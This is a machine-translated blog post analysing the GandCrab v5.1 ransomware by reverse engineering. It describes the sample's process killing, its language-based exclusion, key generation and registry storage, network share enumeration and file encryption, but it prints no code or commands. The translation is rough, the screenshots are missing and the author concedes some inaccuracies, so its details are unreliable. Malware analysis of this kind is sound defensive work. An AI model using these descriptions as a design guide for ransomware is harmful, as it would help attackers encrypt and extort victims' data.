Shulou(Shulou.com)06/01 Report--

Preface to ☣:

After the outbreak of   WannaCry using the Eternal Blue vulnerability, the most frequent type of virus security confrontation is the blackmail virus. The GandCrab family of blackmail virus was captured at the beginning of 17 years or earlier, until 18 years had been updated and iterated to version 5.0. At the end of 18 years, security researchers discovered the latest version of V5.1 of GandCrab blackmail virus.

  's personal view on blackmail: when he first heard of the blackmail virus, he felt that it must be driven by irresistible interests that would allow a group of people to iterate, maintain and develop the blackmail virus. This truth is like starting a company, can take the virus to the whole world, has been very successful, seemingly simple, in fact, the connection behind is complex. In addition to the complexity of the encryption algorithm, the latent and concealment of blackmail (string confusion encryption) is also in place.

  in fact, no matter what, those API or those API, even if their own implementation of similar functions, enough time can be from the function function and assembly, to logic to the reasoning process, so as to achieve, restore.

✃

1. Warm-up (collecting system information, lifting rights, registry operation, compatible matching, encryption and decryption key strings, etc.)

2. Enumerate scanning (network sharing, resource enumeration, traversing scan files)

3. Encrypt files (filtered and matched files are encrypted in different ways)

4. Wrap-up work (sending blackmail messages, deleting viruses, destroying processes, etc.)

Most of the viruses analyzed by   will do this, because he needs to ensure not only the stability of your system, but also his own security and functional implementation, so that he can extort money.

   ps: a mind map is attached at the end of the article

✃

☛ preheating analysis:

1. Online analysis:

  Picture 1: online Analysis

  picture 2: sample information

2. Tool analysis:

  Picture 3: exeinfo pe

☛ detailed analysis:

If ① pulls in IDA, you may see floral confusion, as shown below:

  Picture 4: flower instruction confusion

 ② as shown in the figure above, the GandCrab.00426F7A function marks the beginning of the blackmail virus. When you find the desktop pop-up window "We'll be back soon", congratulations on having caught the GandCrab blackmail virus, as shown below:

  Picture 5: MessageBox

The  ③ GandCrab.00405FF7 function first creates a snapshot and traverses the process for fear of affecting the encryption effect when encrypting files, such as files being occupied, as shown below:

  Picture 6: initialize string

  Picture 7: traversing the comparison process

  Picture 8: the matching process ends

 ④ as shown in figure 3, GandCrab.00405944 is the core function. First, let's take a look at obtaining windows version information and SID, that is, the current permission level, as shown below:

  Picture 9: Windows version Information

  Picture 10: current permission level

The  ⑤ GandCrab.004054BA function acquires the keyboard layout key value in the registry and gets the default installation language of the current user and system. If it matches to 419 (Russia), 422 (Ukraine), 423 (Belgium), etc., then the text will be deleted and the process will be terminated, which means that there is no blackmail, as shown below:

  Picture 11: key value Loop

  Picture 12: match is successful

 ⑥ continues linear tracking, and the GandCrab.00405016 function is responsible for obtaining system information, retrieving the file system and volume information associated with the disk directory, and then using the disk data hash to obtain random strings to create .lock mutexes:

  Picture 13: create a mutex

⑦ GandCrab.0040586C function that encrypts and XOR strings to obtain public key 1, as shown below:

  Picture 14: get RSA1

⑧ parameters are stacked, security processes are scanned, and critical system data is XOR decrypted, as shown below:

  Picture 15: stack parameters

  Picture XVI: schematic

  Picture 17: system data splicing

  Picture 18: security service traversal

  Picture 19: stitched data

  Picture 20: decryption

The ⑨ system does not display the critical-error-handler message box, does not show exceptions, and initializes the critical area, as shown below:

  Picture 21: SetErrorMode

 ⑩ is shown in the figure above. The GandCrab.00404DC5 function is the core function of GandCrab blackmail. First, random numbers are obtained by using the CSP series functions provided by Microsoft, as shown below:

  Picture 22: GetModuleHandleA

⑪ decrypts the string, which is found to be the suffix of the file name, as shown below:

  Picture 23: file suffix

⑫ randomly generates keys and exports public and private keys, as shown below:

  Picture 24: export Key

⑬ then creates the registry ex_data\ data and sets random characters as follows:

  Picture 25: setting up the registry

⑭ imports the public key and encrypts the data:

  Picture 26: hard-coded public key import

⑮ created key_datas\ datas, set the public= public key, private= hard-coded encrypted private key (plus random numbers and other data)

  Picture 27: registry Settings

⑯ has an interesting way of assigning values. Push goes on the stack, pop pops up to registers, and assigns values to memory variables, as shown below:

  Picture 28: assignment method

⑰ uses Base64 to encrypt the previous key, and then concatenates the blackmail warning string with the obtained pc data, as shown below:

  Picture 29: blackmail warning

The file suffix format is pressed under ⑱. You should be ready to enumerate network resources, traverse files, and encrypt files, as shown below:

  Picture 30: GandCrab.00403D8E

Two threads are created inside ⑲, and thread analysis one is shown below:

  Picture 31: callback function

  Picture 32: local area Network enumeration

  Picture 34: traversing file directories and disks on the local area network

  Picture 35: recursive scan

  Pictures 36: encryption and filtering

  Picture 37: encryption process

  Picture 38: hard-coded public key encrypted files

⑳ thread analysis II, as shown below:

  Picture 39: local files are encrypted and quit the process

Finally, the function GandCrab.00405252 is called to execute ShellExecute, which executes the following instructions:

 ✎ sample on the use of CVE vulnerability to lift the weight code is not analyzed, because there is no matching 0x1000 in the test environment, skipping the weight function, many of the above analysis points are not accurate, but restore the overall logic of the sample.

  's research on hard-coded public key encryption uses CSP, also known as "encryption Service provider (Cryptographic Service Provider)", a set of API provided by Microsoft, which will have the opportunity to implement and study it in depth.

✃

Mind mapping:

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.